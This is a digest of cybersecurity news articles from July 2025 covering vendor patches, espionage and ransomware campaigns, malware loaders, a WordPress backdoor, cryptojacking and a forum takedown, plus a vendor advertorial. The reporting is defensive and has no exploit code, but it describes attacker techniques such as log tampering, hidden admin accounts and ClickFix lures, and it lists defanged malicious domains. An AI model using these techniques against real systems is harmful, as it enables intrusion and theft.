2025-07-25 AI创业新闻

Mitel has released security updates to address a critical security flaw in MiVoice MX-ONE that could allow an attacker to bypass authentication protections. “An authentication bypass vulnerability has been identified in the Provisioning Manager component of Mitel MiVoice MX-ONE, which, if successfully exploited, could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper access control,” the company said in an advisory released Wednesday. “A successful exploit of this vulnerability could allow an attacker to gain unauthorized access to user or admin accounts in the system.” The shortcoming, which is yet to be assigned a CVE identifier, carries a CVSS score of 9.4 out of a maximum of 10.0. It affects MiVoice MX-ONE versions from 7.3 (7.3.0.0.50) to 7.8 SP1 (7.8.1.0.14).

Patches for the issue have been made available in MXO-15711_78SP0 and MXO-15711_78SP1 for MX-ONE versions 7.8 and 7.8 SP1, respectively. Customers using MiVoice MX-ONE version 7.3 and above are recommended to submit a patch request to their authorized service partner. As mitigations until fixes can be applied, it’s advised to limit direct exposure of MX-ONE services to the public internet and ensure that they are placed within a trusted network. Along with the authentication bypass flaw, Mitel has shipped updates to resolve a high-severity vulnerability in MiCollab (CVE-2025-52914, CVSS score: 8.8) that, if successfully exploited, could permit an authenticated attacker to carry out an SQL injection attack.

“A successful exploit could allow an attacker to access user provisioning information and execute arbitrary SQL database commands with potential impacts on the confidentiality, integrity, and availability of the system,” Mitel said . The vulnerability, which impacts MiCollab versions 10.0 (10.0.0.26) to 10.0 SP1 FP1 (10.0.1.101) and 9.8 SP3 (9.8.3.1) and earlier, has been resolved in versions 10.1 (10.1.0.10), 9.8 SP3 FP1 (9.8.3.103), and later. With shortcomings in Mitel devices coming under active attacks in the past, it’s essential that users move quickly to update their installations as soon as possible to mitigate potential threats. Found this article interesting?

Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments

Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign. The activity, observed this year, is primarily designed Now to infiltrate organizations’ VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today. “The threat actor leveraged combinations of sophisticated and stealthy techniques creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within presumed to be isolated environments,” the cybersecurity company said . “The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromise infrastructure.” Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886 , a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.

Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances. Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks. Fire Ant’s breach of the virtualization management layer is achieved by the exploitation of CVE-2023-34048 , a known security flaw in VMware vCenter Server that has been exploited by UNC3886 as a zero-day for years prior to it being patched by Broadcom in October 2023. “From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted.

“They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned the VIRTUALPITA malware family.” Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon. Upon gaining unauthorized access to the hypervisor, the attackers are said to have leveraged another flaw in VMware Tools ( CVE-2023-20867 ) to interact directly with guest virtual machines via PowerCLI, as well as interfered with the functioning of security tools and extracted credentials from memory snapshots, including that of domain controllers.

Some of the other crucial aspects of the threat actor’s tradecraft are as follows - Dropping V2Ray framework to facilitate guest network tunneling Deploying unregistered virtual machines directly on multiple ESXi hosts Breaking down network segmentation barriers and establishing cross-segments persistence Resist incident response and remediation efforts by re-compromising assets and, in some cases, blend in by renaming their payloads to impersonate forensic tools The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets. Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.

The findings underscore a worrying trend involving the persistent and successful targeting of network edge devices by threat actors , particularly those from China , in recent years. “This campaign underscores the importance of visibility and detection within the hypervisor and infrastructure layer, where traditional endpoint security tools are ineffective,” Sygnia said. “Fire Ant consistently targeted infrastructure systems such as ESXi hosts, vCenter servers, and F5 load balancers. The targeted systems are rarely integrated into standard detection and response programs.

These assets lack detection and response solutions and generate limited telemetry, making them ideal long-term footholds for stealthy operation.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos and ClickFix Phishing

Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News. The malware loader, first observed in the wild earlier this year, has been used to distribute DeerStealer , RedLine , StealC , NetSupport RAT , SectopRAT , and even other loaders like Hijack Loader . “It employs dead code injection and packing techniques to hinder analysis,” the company said.

“After unpacking itself at runtime, it connects to a C2 (command-and-control) server, downloads target modules, and executes them.” CastleLoader’s modular structure allows it to act as both a delivery mechanism and a staging utility, enabling threat actors to separate initial infection from payload deployment. This separation complicates attribution and response because it decouples the infection vector from the eventual malware behavior, giving attackers more flexibility in adapting campaigns over time. CastleLoader payloads are distributed as portable executables containing an embedded shellcode, which then invokes the main module of the loader that, in turn, connects to the C2 server in order to fetch and execute the next-stage malware. Attacks distributing the malware have relied on the prevalent ClickFix technique on domains posing as software development libraries, videoconferencing platforms, browser update notifications, or document verification systems, ultimately tricking users into copying and executing PowerShell commands that activate the infection chain.

Victims are directed to the bogus domains through Google searches, at which point they are served pages containing fake error messages and CAPTCHA verification boxes developed by the threat actors, asking them to carry out a series of instructions to supposedly address the issue. Alternatively, CastleLoader leverages fake GitHub repositories mimicking legitimate tools as a distribution vector, causing users who unknowingly download them to compromise their machines with malware instead. “This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT said. This strategic abuse of social engineering mirrors techniques used in initial access brokers (IABs), underscoring its role within a broader cybercrime supply chain.

PRODAFT said it has observed Hijack Loader being delivered via DeerStealer as well as CastleLoader, with the latter also propagating DeerStealer variants. This suggests the overlapping nature of these campaigns, despite them being orchestrated by different threat actors. Since May 2025, CastleLoader campaigns have leveraged seven distinct C2 servers, with over 1,634 infection attempts recorded during the time period. Analysis of its C2 infrastructure and its web-based panel—which is used to oversee and manage the infections – shows that as many as 469 devices were compromised, resulting in an infection rate of 28.7%.

Researchers also observed elements of anti-sandboxing and obfuscation—features typical in advanced loaders like SmokeLoader or IceID. Combined with PowerShell abuse, GitHub impersonation, and dynamic unpacking, CastleLoader reflects a growing trend in stealth-first malware loaders that operate as stagers in malware-as-a-service (MaaS) ecosystems. “Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said . “Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape.” “The C2 panel demonstrates operational capabilities typically associated with malware-as-a-service (MaaS) offerings, suggesting the operators have experience in cybercriminal infrastructure development.” Found this article interesting?

Secure your LLMs Against Real-World Threats

Sophos and SonicWall Patch Critical RCE Flaws Affecting Firewalls and SMA 100 Devices

Sophos and SonicWall have alerted users of critical security flaws in Sophos Firewall and Secure Mobile Access (SMA) 100 Series appliances that could be exploited to achieve remote code execution. The two vulnerabilities impacting Sophos Firewall are listed below - CVE-2025-6704 (CVSS score: 9.8) - An arbitrary file writing vulnerability in the Secure PDF eXchange (SPX) feature can lead to pre-auth remote code execution, if a specific configuration of SPX is enabled in combination with the firewall running in High Availability (HA) mode CVE-2025-7624 (CVSS score: 9.8) - An SQL injection vulnerability in the legacy (transparent) SMTP proxy can lead to remote code execution, if a quarantining policy is active for Email and SFOS was upgraded from a version older than 21.0 GA Sophos said CVE-2025-6704 affects about 0.05% of devices, while CVE-2025-7624 impacts as many as 0.73% of devices. Both vulnerabilities have been addressed alongside a high-severity command injection vulnerability in the WebAdmin component ( CVE-2025-7382 , CVSS score: 8.8) that could result in pre-auth code execution on High Availability (HA) auxiliary devices, if OTP authentication for the admin user is enabled. Also patched by the company are two other vulnerabilities - CVE-2024-13974 (CVSS score: 8.1) - A business logic vulnerability in the Up2Date component can lead to attackers controlling the firewall’s DNS environment to achieve remote code execution CVE-2024-13973 (CVSS score: 6.8) - A post-auth SQL injection vulnerability in WebAdmin can potentially lead to administrators achieving arbitrary code execution The U.K.

National Cyber Security Centre (NCSC) has been credited with discovering and reporting both CVE-2024-13974 and CVE-2024-13973. The issues affect the following versions - CVE-2024-13974 - Affects Sophos Firewall v21.0 GA (21.0.0) and older CVE-2024-13973 - Affects Sophos Firewall v21.0 GA (21.0.0) and older CVE-2025-6704 - Affects Sophos Firewall v21.5 GA (21.5.0) and older CVE-2025-7624 - Affects Sophos Firewall v21.5 GA (21.5.0) and older CVE-2025-7382 - Affects Sophos Firewall v21.5 GA (21.5.0) and older The disclosure comes as SonicWall detailed a critical bug in the SMA 100 Series web management interface (CVE-2025-40599, CVSS score: 9.1) that a remote attacker with administrative privileges can exploit to upload arbitrary files and potentially achieve remote code execution. The flaw impacts SMA 100 Series products (SMA 210, 410, 500v) and has been addressed in version 10.2.2.1-90sv. SonicWall also pointed out that while the vulnerability has not been exploited, there exists a potential risk in light of a recent report from the Google Threat Intelligence Group (GTIG), which found evidence of a threat actor dubbed UNC6148 leveraging fully-patched SMA 100 series devices to deploy a backdoor called OVERSTEP .

Besides applying the fixes, the company is also recommending that customers of SMA 100 Series devices carry out the following steps - Disable remote management access on the external-facing interface (X1) to reduce the attack surface Reset all passwords and reinitialize OTP (One-Time Password) binding for users and administrators on the appliance Enforce multi-factor authentication (MFA) for all users Enable Web Application Firewall (WAF) on SMA 100 Organizations using SMA 100 Series devices are also advised to review appliance logs and connection history for anomalies and check for any signs of unauthorized access. Organizations using the SMA 500v virtual product are required to backup the OVA file, export the configuration, remove the existing virtual machine and all associated virtual disks and snapshots, reinstall the new OVA from SonicWall using a hypervisor, and restore the configuration. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Is Managing Customer Logins and Data Giving You Headaches? You’re Not Alone! Today, we all expect super-fast, secure, and personalized online experiences. But let’s be honest, we’re also more careful about how our data is used.

If something feels off, trust can vanish in an instant. Add to that the lightning-fast changes AI is bringing to everything from how we log in to spotting online fraud, and it’s a whole new ball game! If you’re dealing with logins, data privacy, bringing new users on board, or building digital trust, this webinar is for you . Join us for “ Navigating Customer Identity in the AI Era ,” where we’ll dive into the Auth0 2025 Customer Identity Trends Report .

We’ll show you what’s working, what’s not, and how to tweak your strategy for the year ahead. In just one session, you’ll get practical answers to real-world challenges like: How AI is changing what users expect – and where they’re starting to push back. The new identity threats on the rise – and how to stop them early. Making logins smoother and easier – without sacrificing security.

Where AI can help you big time – and where you still need that human touch. What top digital companies are doing differently to stay ahead. This session is perfect for anyone focused on making customer experiences better, boosting security, or driving digital innovation. Whether you’re an IT or security leader, a product team member, or part of marketing and customer experience, you’ll find valuable takeaways.

Even if you’re leading digital transformation, this webinar offers key guidance to align AI with what customers truly want. Watch this Webinar “Navigating Customer Identity in the AI Era” is your chance to get ahead with insights from the Auth0 2025 CIAM Trends Report. The webinar is on July 28, 2025 , and with an expert from Auth0 by Okta, a trusted name in secure identity solutions. Registration is free, but spots are limited!

Don’t miss out on future-proofing your identity strategy, staying compliant, and building massive digital trust. As AI keeps evolving, your customer identity strategy needs to evolve with it. This webinar gives you the data, the trends, and the expert insights to make smarter decisions – starting now. Don’t get left behind.

Join us and become a leader in customer trust! Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Pentests once a year? Nope. It’s time to build an offensive SOC

You wouldn’t run your blue team once a year, so why accept this substandard schedule for your offensive side? Your cybersecurity teams are under intense pressure to be proactive and to find your network’s weaknesses before adversaries do. But in many organizations, offensive security is still treated as a one-time event: an annual pentest, a quarterly red team engagement, maybe an audit sprint before a compliance deadline . That’s not defense.

It’s a theater. In the real world, adversaries don’t operate in bursts. Their recon is continuous, their tools and tactics are always evolving, and new vulnerabilities are often reverse-engineered into working exploits within hours of a patch release. So, if your offensive validation isn’t just as dynamic, you’re not just lagging, you’re exposed.

It’s time to move beyond the once a year pentest. It’s time to build an Offensive Security Operations Center . Why annual pentesting falls short Point-in-time penetration tests still serve a role, and are here to remain a compliance requirement. But they fall short in environments that change faster than they can be assessed.

This is true for a number of reasons: The scope is limited. Most enterprise pentests are scoped to avoid business disruption, but we all know that attackers don’t care about your scope, or unless they’re in stealth mode, disrupting your business. Controls decay silently. Drift is constant.

An EDR policy gets loosened. A SIEM rule breaks. And annual pentests are not built to catch these problems. The security control that “passed” in the test may very well fail when it really matters, two weeks later.

Access escalates quietly. In Active Directory environments, misconfigurations accumulate silently over time, nested groups, stale accounts, over-privileged service identities, and well-known privilege escalation paths are commonplace. These aren’t just theoretical risks; they’ve been actively leveraged for decades. Attackers don’t need zero-days to succeed.

They rely on weak trust relationships, configuration drift, and a lack of visibility. Timing lags. By the time a pentest report is delivered, your environment has already changed. You’re chasing what was , not what is .

It’s like looking at last month’s video from your door camera to see what’s happening today. However, this is not a call to abolish pentesting. Quite the opposite, manual pentests bring human creativity, contextual awareness, and adversarial thinking that no automation can replicate. But relying on them alone, especially when performed only once or twice a year, limits their impact.

By building an Offensive SOC and operationalizing continuous validation, organizations enable pentesters to focus on what they do best: uncover edge cases , bypass defenses creatively , and explore complex scenarios beyond the reach of automation. In short: an Offensive SOC doesn’t replace pentesting, it gives it room to evolve. Without continuous validation, a security posture becomes a snapshot, not a source of truth. From point-in-time defense to persistent offense The Offensive Security Operations Center (Offensive SOC) flips the model from a one-off pentest as part of a decidedly defensive SOC to a team continuously out-maneuvering adversaries by thinking and acting like an attacker, every single day.

Instead of waiting for trouble to respond to, the Offensive SOC is collaborative, transparent, and built to uncover tangible risks and drive actual fixes, in real time. Think of it this way: If a traditional SOC raises alerts on attacks that reach you, the Offensive SOC raises alerts on vulnerabilities that could . And the tools that power it? It’s time to toss your outdated clipboards, and checklists, and power up Breach and Attack Simulation (BAS) and Automated Penetration Testing solutions.

The core pillars of the offensive SOC

Continuously discovering what’s exposed You can’t validate what you haven’t found. Your organization’s attack surface is rife with sprawling with cloud workloads, unmanaged assets, shadow IT, stale DNS records, and public S3 buckets. It’s time to accept that periodic scans just don’t cut it anymore.

Discovery must be persistent and continuous, just like an attacker would do. 2. Real-world attack simulation with BAS Breach and Attack Simulation (BAS) doesn’t guess. It simulates real-world TTPs mapped to industry-recognized frameworks like MITRE ATT&CK® across the kill chain.

BAS answers a series of practical yet high-stakes questions: Can your SIEM catch a credential dumping attack? Will your EDR block known ransomware? Does your WAF stop critical web attacks like Citrix Bleed or IngressNightmare? BAS is about controlled, safe, production-aware testing and executing the same techniques attackers use, against your actual controls without actually putting your data, bottom line, and reputation at risk.

BAS will show you exactly what works, what fails, and where to best focus your efforts. 3. Exploit Chain Testing with Automated Pentesting Sometimes individual vulnerabilities may not be harmful on their own. However, adversaries carefully chain multiple vulnerabilities and misconfigurations together to achieve their objectives.

With Automated Penetration Testing , security teams can validate how a real compromise could unfold, step by step, end to end. Automated Pentesting simulates an assumed breach from a domain-joined system, starting with access to a low-privileged or system-level user. From this foothold, it discovers and validates the shortest, stealthiest attack paths to critical assets, such as domain admin privileges, by chaining real techniques like credential theft, lateral movement, and privilege escalation. Here’s an example: Initial access to an HR workstation exposes a Kerberoasting opportunity, triggered by misconfigured service account permissions.

Offline password cracking reveals plaintext credentials. Those credentials enable lateral movement to another machine. Eventually, the simulation captures a domain admin’s NTLM hash, with no alerts triggered and no controls intervening. This is just one scenario among thousands, but it mirrors the real tactics adversaries use to escalate their privileges inside your network .

Drift Detection and Posture Tracking Security isn’t static. Rules change. Configurations shift.

Controls fail quietly. The Offensive SOC keeps score over time. It tracks when your prevention and detection layer solutions start to slip, like: An EDR policy update that disables known malware signatures A SIEM alert that quietly stops firing after a rule modification A firewall rule that’s altered during maintenance, leaving a port exposed The Offensive SOC doesn’t just tell you what failed, it tells you when it started failing. And this is how you stay ahead: not by reacting to alerts, but by catching your vulnerabilities before they’re exploited.

Where Picus fits in Picus helps security teams operationalize the Offensive SOC , with a unified platform that continuously validates exposures across prevention, detection, and response layers. We combine: BAS to test how your controls respond to real-world threats. Automated penetration testing to simulate attacker movement post-access, and identify high-risk paths. Known threat and mitigation libraries to simulate attacks and close gaps faster.

Seamless integration with your existing SOC stack. And Picus isn’t just making promises. The Blue Report 2024 found that: Organizations using Picus reduced critical vulnerabilities by over 50% . Customers doubled their prevention effectiveness in 90 days.

Teams mitigated security gaps 81% faster using Picus . With Picus, you can boldly move beyond assumptions and make decisions backed by validation. That’s the value of an Offensive SOC: focused, efficient, and continuous security improvement. Final thought: Validation isn’t a report, it’s a practice Building an Offensive SOC isn’t about adding more dashboards, solutions, or noise; it’s about turning your reactive security operations center into a continuous validation engine.

It means proving what’s exploitable, what’s protected, and what needs attention. Picus helps your security teams do exactly that, operationalizing validation across your entire stack. Ready to explore the details? Download The CISO’s Guide for Security and Exposure Validation to: Understand the complementary roles of Breach and Attack Simulation and Automated Penetration Testing Learn how to prioritize risk based on exploitability, not just severity See how to embed Adversarial Exposure Validation into your CTEM strategy for continuous, measurable improvement 🔗 Get the Exposure Validation Guide and make validation part of your everyday SOC operations, not just something you check off a list once a year.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

China-Based APTs Deploy Fake Dalai Lama Apps to Spy on Tibetan Community

The Tibetan community has been targeted by a China-nexus cyber espionage group as part of two campaigns conducted last month ahead of the Dalai Lama’s 90th birthday on July 6, 2025. The multi-stage attacks have been codenamed Operation GhostChat and Operation PhantomPrayers by Zscaler ThreatLabz. “The attackers compromised a legitimate website, redirecting users via a malicious link and ultimately installing either the Gh0st RAT or PhantomNet (aka SManager) backdoor onto victim systems,” security researchers Sudeep Singh and Roy Tay said in a Wednesday report. This is not the first time Chinese threat actors have resorted to watering hole attacks (aka strategic web compromises), a technique where adversaries break into websites frequently visited by a specific group to infect their devices with malware.

Over the past two years, hacking groups like EvilBamboo , Evasive Panda , and TAG-112 have all resorted to the approach to target the Tibetan diaspora with the ultimate goal of gathering sensitive information. Operation GhostChat The latest set of attacks observed by Zscaler entails the compromise of a web page to replace the link pointing to “tibetfund[.]org/90thbirthday” with a fraudulent version (“thedalailama90.niccenter[.]net”). While the original web page is designed to send a message to the Dalai Lama, the replica page adds an option to send an encrypted message to the spiritual leader by downloading from “tbelement.niccenter[.]net” a secure chat application named TElement, which claims to be Tibetan version of Element . Hosted on the website is a backdoored version of the open-source encrypted chat software containing a malicious DLL that’s sideloaded to launch Gh0st RAT , a remote access trojan widely used by various Chinese hacking groups.

The web page also includes JavaScript code designed to collect the visitor’s IP address and user-agent information, and exfiltrate the details to the threat actor via an HTTP POST request. Operation PhantomPrayers Gh0st RAT is a fully-featured malware that supports file manipulation, screen capture, clipboard content extraction, webcam video recording, keylogging, audio recording and playback, process manipulation, and remote shell. The second campaign, Operation PhantomPrayers, has been found to leverage another domain, “hhthedalailama90.niccenter[.]net,” to distribute a phony “90th Birthday Global Check-in” app (“DalaiLamaCheckin.exe,” dubbed PhantomPrayers) that, when opened, displays an interactive map and urges victims to “send your blessings” for the Dalai Lama by tapping their location on the map. However, the malicious functionality is stealthily triggered in the background, using DLL side-loading techniques to launch PhantomNet , a backdoor that establishes contact with a command-and-control (C2) server over TCP to receive additional plugin DLLs for execution on the compromised machine.

“PhantomNet can be set to operate only during specific hours or days, but this capability is not enabled in the current sample,” the researchers said. “PhantomNet used modular plugin DLLs, AES-encrypted C2 traffic, and configurable timed operations, to stealthily manage compromised systems.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Storm-2603 Exploits SharePoint Flaws to Deploy Warlock Ransomware on Unpatched Systems

Microsoft has revealed that one of the threat actors behind the active exploitation of SharePoint flaws is deploying Warlock ransomware on targeted systems. The tech giant, in an update shared Wednesday, said the findings are based on an “expanded analysis and threat intelligence from our continued monitoring of exploitation activity by Storm-2603 .” The threat actor attributed to the financially motivated activity is a suspected China-based threat actor that’s known to drop Warlock and LockBit ransomware in the past. The attack chains entail the exploitation of CVE-2025-49706, a spoofing vulnerability, and CVE-2025-49704, a remote code execution vulnerability, targeting unpatched on-premises SharePoint servers to deploy the spinstall0.aspx web shell payload. “This initial access is used to conduct command execution using the w3wp.exe process that supports SharePoint,” Microsoft said.

“Storm-2603 then initiates a series of discovery commands, including whoami, to enumerate user context and validate privilege levels.” The attacks are characterized by the use of cmd.exe and batch scripts as the threat actor burrows deeper into the target network, while services.exe is abused to turn off Microsoft Defender protections by modifying the Windows Registry. In addition to leveraging spinstall0.aspx for persistence, Storm-2603 has been observed creating scheduled tasks and modifying Internet Information Services (IIS) components to launch what Microsoft described as suspicious .NET assemblies. These actions are designed to ensure ongoing access even if the victims take steps to plug the initial access vectors. Some of the other noteworthy aspects of the attacks include the deployment of Mimikatz to harvest credentials by targeting the Local Security Authority Subsystem Service ( LSASS ) memory, and then proceeding to conduct lateral movement using PsExec and the Impacket toolkit.

“Storm-2603 is then observed modifying Group Policy Objects (GPO) to distribute Warlock ransomware in compromised environments,” Microsoft said. As mitigations, users are urged to follow the steps below - Upgrade to supported versions of on-premises Microsoft SharePoint Server Apply the latest security updates Ensure the Antimalware Scan Interface is turned on and configured correctly Deploy Microsoft Defender for Endpoint, or equivalent solutions Rotate SharePoint Server ASP.NET machine keys Restart IIS on all SharePoint servers using iisreset.exe (If AMSI cannot be enabled, it’s advised to rotate the keys and restart IIS after installing the new security update) Implement incident response plan The development comes as the SharePoint Server flaws have come under large-scale exploitation, already claiming at least 400 victims. Linen Typhoon (aka APT27) and Violet Typhoon (aka APT31) are two other Chinese hacking groups that have been linked to the malicious activity. China has denied the allegations.

“Cybersecurity is a common challenge faced by all countries and should be addressed jointly through dialogue and cooperation,” China’s Foreign Ministry Spokesperson Guo Jiakun said . “China opposes and fights hacking activities in accordance with the law. At the same time, we oppose smears and attacks against China under the excuse of cybersecurity issues.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cybercrime Marketplace

Europol on Monday announced the arrest of the suspected administrator of XSS.is (formerly DaMaGeLaB), a notorious Russian-speaking cybercrime platform. The arrest, which took place in Kyiv, Ukraine, on July 222, 2025, was led by the French Police and Paris Prosecutor, in collaboration with Ukrainian authorities and Europol. The action is the result of an investigation that was launched by the French Police in July 2021. Coupled with the arrest, law enforcement has also taken control of the clearnet domain of XSS.is, greeting visitors with a seizure notice, “This domain has been seized by la Brigade de Lutte Contre la Cybercriminalité with assistance of the SBU Cyber Department.” “The forum, which had more than 50,000 registered users, served as a key marketplace for stolen data, hacking tools and illicit services,” the law enforcement agency said .

“It has long been a central platform for some of the most active and dangerous cybercriminal networks, used to coordinate, advertise and recruit.” The forum’s administrator, besides engaging in the technical operations of the service, is said to have enabled criminal activity by acting as a trusted third-party to arbitrate disputes between criminals and guarantee the security of transactions. The unnamed individual is also believed to have run thesecure.biz, a private messaging platform specially built to cater to the needs of cybercriminals. Through these illicit ventures, the suspect is estimated to have made €7 million ($8.24 million) in profits from advertising and facilitation fees. “Investigators believe he has been active in the cybercrime ecosystem for nearly two decades, and maintained close ties to several major threat actors over the years,” Europol added.

According to the Paris Prosecutor , XSS.is has been active since 2013, acting as a hub for all this cybercrime, ranging from access to compromised systems and ransomware-related services. It also offered an encrypted Jabber messaging server that let cybercriminals communicate anonymously. XSS.is, along with Exploit, has served as the backbone of the Russian-speaking cybercriminal ecosystem , with the threat actors on these forums primarily singling out non-Russian-speaking countries. Data shared by KELA shows that XSS currently has 48,750 registered users and more than 110,000 threads.

“To facilitate illicit transactions, the forum has a built-in reputation system,” KELA said . “Members can use a forum-appointed escrow service to ensure that deals are completed without scams, as well as add a deposit, contributing to their reputation.” The development comes a week after a Europol-led operation disrupted the online infrastructure associated with a pro-Russian hacktivist group known as NoName057(16) and the arrest of two people for conducting distributed denial-of-service (DDoS) attacks against Ukraine and its allies using a volunteer-driven Go-based tool called DDoSia. Recorded Future’s Insikt Group, in a report published this week, said the group targeted 3,776 unique hosts between July 1, 2024, and July 14, 2025, primarily government, public-sector, transportation, technology, media, and financial entities in European nations opposing Russia’s invasion of Ukraine. Ukrainian organizations accounted for the largest share of targets (29.47%), followed by France (6.09%), Italy (5.39%), Sweden (5.29%), Germany (4.60%), Israel (4.50%), Czechia (4%), Poland (4%), and the United Kingdom (3.30%).

The United States is a notable exclusion, despite its support for Ukraine. An extensive analysis of NoName057(16)’s infrastructure has laid bare a resilient, multi-tiered architecture consisting of rapidly rotated Tier 1 command-and-control (C2) servers and Tier 2 servers protected by access control lists (ACLs) to limit upstream access and maintain reliable C2 functionality. As many as 275 unique Tier 1 have been identified during the time period. “The threat group maintains a high operational tempo, averaging 50 unique targets daily, with intense bursts of activity correlating to geopolitical and military developments in Ukraine,” the Mastercard-owned cybersecurity company said .

“NoName057(16) uses a mixture of network and application-layer DDoS attacks, selecting methods designed to overwhelm server resources and disrupt availability. The threat group’s attack methodology is straightforward yet effective, prioritizing high-volume floods and resource exhaustion techniques.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Hackers Deploy Stealth Backdoor in WordPress Mu-Plugins to Maintain Admin Access

Cybersecurity researchers have uncovered a new stealthy backdoor concealed within the “mu-plugins” directory in WordPress sites to grant threat actors persistent access and allow them to perform arbitrary actions. Must-use plugins (aka mu-plugins) are special plugins that are automatically activated on all WordPress sites in the installation. They are located in the “wp-content/mu-plugins” directory by default. What makes them an attractive option for attackers is that mu-plugins do not show in the default list of plugins on the Plugins page of wp-admin and cannot be disabled except by removing the plugin file from the must-use directory.

As a result, a piece of malware that leverages this technique allows it to function quietly, without raising any red flags. In the infection spotted by web security company Sucuri, the PHP script in the mu-plugins directory (“wp-index.php”) serves as a loader to fetch a next-stage payload and save it in the WordPress database within the wp_options table under _hdra_core. The remote payload is retrieved from a URL that’s obfuscated using ROT13 , a simple substitution cipher that replaces a letter with the 13th letter after it (i.e., A becomes N, B becomes O, C becomes P, and so forth). “The fetched content is then temporarily written to disk and executed,” security researcher Puja Srivastava said .

“This backdoor gives the attacker persistent access to the site and the ability to run any PHP code remotely. Specifically, it injects a hidden file manager into the theme directory as “pricing-table-3.php,” permitting threat actors to browse, upload, or delete files. It also creates an administrator user named “officialwp” and then downloads a malicious plugin (“wp-bot-protect.php”) and activates it. Besides reinstating the infection in the event of deletion, the malware incorporates the ability to change the passwords of common administrator usernames, such as “admin,” “root,” and “wpsupport,” to a default password set by the attacker.

This also extends to its own “officialwp” user. In doing so, the threat actors can enjoy persistent access to the sites and perform malicious actions, while effectively locking out other administrators. This can range from data theft to injecting code that can serve malware to site visitors or redirect them to other scammy sites. “The attackers gain full administrator access and a persistent backdoor, allowing them to do anything on the site, from installing more malware to defacing it,” Srivastava said.

“The remote command execution and content injection features mean the attackers can change the malware’s behavior.” To mitigate against these threats, it’s essential that site owners update WordPress, themes, and plugins periodically, secure accounts using two-factor authentication, and regularly audit all sections of the site, including theme and plugin files. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Threat Actor Mimo Targets Magento and Docker to Deploy Crypto Miners and Proxyware

The threat actor behind the exploitation of vulnerable Craft Content Management System (CMS) instances has shifted its tactics to target Magento CMS and misconfigured Docker instances. The activity has been attributed to a threat actor tracked as Mimo (aka Hezb), which has a long history of leveraging N-day security flaws in various web applications to deploy cryptocurrency miners. “Although Mimo’s primary motivation remains financial, through cryptocurrency mining and bandwidth monetization, the sophistication of their recent operations suggests potential preparation for more lucrative criminal activities,” Datadog Security Labs said in a report published this week. Mimo’s exploitation of CVE-2025-32432, a critical security flaw in Craft CMS, for cryptojacking and proxyjacking was documented by Sekoia in May 2025.

Newly observed attack chains associated with the threat actor involve the abuse of undetermined PHP-FPM vulnerabilities in Magento e-commerce installations to obtain initial access, and then using it to drop GSocket , a legitimate open-source penetration testing tool, to establish persistent access to the host by means of a reverse shell. “The initial access vector is PHP-FPM command injection via a Magento CMS plugin, indicating that Mimo possesses multiple exploit capabilities beyond previously observed adversarial tradecraft,” researchers Ryan Simon, Greg Foss, and Matt Muir said. In an attempt to sidestep detection, the GSocket binary masquerades as a legitimate or kernel-managed thread so that it blends in with other processes that may be running on the system. Another notable technique employed by the attackers is the use of in-memory payloads using memfd_create() so as to launch an ELF binary loader called “4l4md4r” without leaving any trace on disk.

The loader is then responsible for deploying the IPRoyal proxyware and the XMRig miner on the compromised machine but not before modifying the “/etc/ld.so.preload” file to inject a rootkit to conceal the presence of these artifacts. The distribution of a miner and proxyware underscores a two-pronged approach adopted by Mimo to maximize financial gain. The distinct revenue generation streams ensure that compromised machines’ CPU resources are hijacked to mine cryptocurrency, while the victims’ unused internet bandwidth is monetized for illicit residential proxy services. “Furthermore, the use of proxyware, which typically consumes minimal CPU, enables stealthy operation that prevents detection of the additional monetization even if the crypto miner’s resource usage is throttled,” the researchers said.

